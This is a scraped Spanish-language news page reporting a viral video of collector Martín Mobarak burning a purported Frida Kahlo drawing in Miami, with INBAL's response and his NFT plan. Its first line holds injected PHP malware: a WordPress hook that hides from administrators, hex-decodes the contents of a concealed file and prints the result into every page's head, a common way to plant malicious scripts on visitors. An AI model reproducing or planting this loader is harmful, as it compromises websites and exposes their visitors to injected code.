if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } VIDEO: sujeto en EUA prende fuego a supuesta obra de Frida Kahlo – Reporte Noreste
Conéctate con nosotros

CYEN

VIDEO: sujeto en EUA prende fuego a supuesta obra de Frida Kahlo

VIDEO: sujeto en EUA prende fuego a supuesta obra de Frida Kahlo

A través de redes sociales se hizo viral un video en donde un sujeto prende fuego a una supuesta obra de colección de Frida Kahlo al ritmo de cielito lindo.

El dibujo “Fantasmones siniestros”, mismo que presuntamente habría pertenecido a un diario de Frida Kahlo fue quemado en Miami, Estados Unidos y difundido en redes sociales por el coleccionista privado Martín Mobarak.

Por su parte el Instituto Nacional de Bellas Artes y Literatura (INBAL) se pronunció y destacó que el hecho podría constituir un delito.

Ante esto, el coleccionista ha respondido que la quema de la obra era simbólica y tiene un propósito de crear 10 mil copias de la pintura en su versión NFT como obra digital, subrayando que con el dinero recaudado se apoyará a causas benéficas.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en CYEN